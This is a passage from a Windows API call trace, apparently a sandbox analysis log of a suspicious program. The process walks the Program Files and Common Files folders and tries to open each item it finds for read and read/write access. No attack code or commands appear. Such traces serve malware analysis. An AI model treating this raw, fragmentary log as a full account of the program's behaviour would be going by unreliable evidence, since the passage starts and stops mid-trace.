hHeap=0x20000) returned 1 [0087.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0087.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0087.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0087.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.872] FindFirstFileExW (in: lpFileName="C:\\Program Files\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78e50 [0087.872] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x40edfa76, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x40edfa76, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.872] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x3b4a1a5a, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3b4a1a5a, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0087.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0087.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0087.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0087.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0087.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0087.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0087.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0087.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0087.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0087.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0087.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0087.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0087.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0087.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0087.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0087.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0087.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.873] AreFileApisANSI () returned 1 [0087.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 30 [0087.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0087.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0087.873] AreFileApisANSI () returned 1 [0087.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0087.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0087.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Program Files\\Common Files") returned 30 [0087.874] CreateFileW (lpFileName="C:\\Program Files\\Common Files" (normalized: "c:\\program files\\common files"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.874] GetLastError () returned 0x5 [0087.874] GetLastError () returned 0x5 [0087.874] SetLastError (dwErrCode=0x5) [0087.874] GetLastError () returned 0x5 [0087.874] SetLastError (dwErrCode=0x5) [0087.874] GetLastError () returned 0x5 [0087.874] SetLastError (dwErrCode=0x5) [0087.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0087.874] AreFileApisANSI () returned 1 [0087.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0087.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0087.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Program Files\\Common Files") returned 30 [0087.874] CreateFileW (lpFileName="C:\\Program Files\\Common Files" (normalized: "c:\\program files\\common files"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.874] GetLastError () returned 0x5 [0087.874] GetLastError () returned 0x5 [0087.874] SetLastError (dwErrCode=0x5) [0087.874] GetLastError () returned 0x5 [0087.874] SetLastError (dwErrCode=0x5) [0087.874] GetLastError () returned 0x5 [0087.874] SetLastError (dwErrCode=0x5) [0087.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0087.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0087.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.875] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0087.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0087.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0087.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0087.875] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a307d95, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5d0779b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5d0779b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0087.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0087.875] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78950 [0087.875] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x3b4a1a5a, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3b4a1a5a, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.875] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89cca170, ftCreationTime.dwHighDateTime=0x1d575b4, ftLastAccessTime.dwLowDateTime=0x46f36b70, ftLastAccessTime.dwHighDateTime=0x1d5d80d, ftLastWriteTime.dwLowDateTime=0x46f36b70, ftLastWriteTime.dwHighDateTime=0x1d5d80d, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="centralcreditcard.exe", cAlternateFileName="CENTRA~1.EXE")) returned 1 [0087.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0087.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0087.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0087.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0087.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0087.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0087.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0087.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0087.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0087.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0087.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0087.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0087.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0087.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0087.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0087.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0087.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0087.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0087.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0087.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0087.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0087.876] AreFileApisANSI () returned 1 [0087.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 52 [0087.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0087.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.876] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0088.006] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0088.006] AreFileApisANSI () returned 1 [0088.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0088.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0088.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x46b38, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\centralcreditcard.exe") returned 52 [0088.009] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\centralcreditcard.exe" (normalized: "c:\\program files\\common files\\centralcreditcard.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0088.013] GetFileType (hFile=0x424) returned 0x1 [0088.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0088.020] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0088.027] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0088.027] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0088.038] CloseHandle (hObject=0x424) returned 1 [0088.039] AreFileApisANSI () returned 1 [0088.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0088.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x469e8 [0088.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x469e8, cchWideChar=52 | out: lpWideCharStr="C:\\Program Files\\Common Files\\centralcreditcard.exe") returned 52 [0088.039] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\centralcreditcard.exe" (normalized: "c:\\program files\\common files\\centralcreditcard.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.039] GetLastError () returned 0x20 [0088.039] GetLastError () returned 0x20 [0088.039] SetLastError (dwErrCode=0x20) [0088.039] GetLastError () returned 0x20 [0088.039] SetLastError (dwErrCode=0x20) [0088.039] GetLastError () returned 0x20 [0088.039] SetLastError (dwErrCode=0x20) [0088.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0088.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0088.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0088.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.039] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.039] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4aab75fe, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0xa0417b85, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4aadd873, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0088.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0088.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0088.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0088.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0088.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d370 [0088.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0088.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.040] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d370 | out: hHeap=0x20000) returned 1 [0088.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 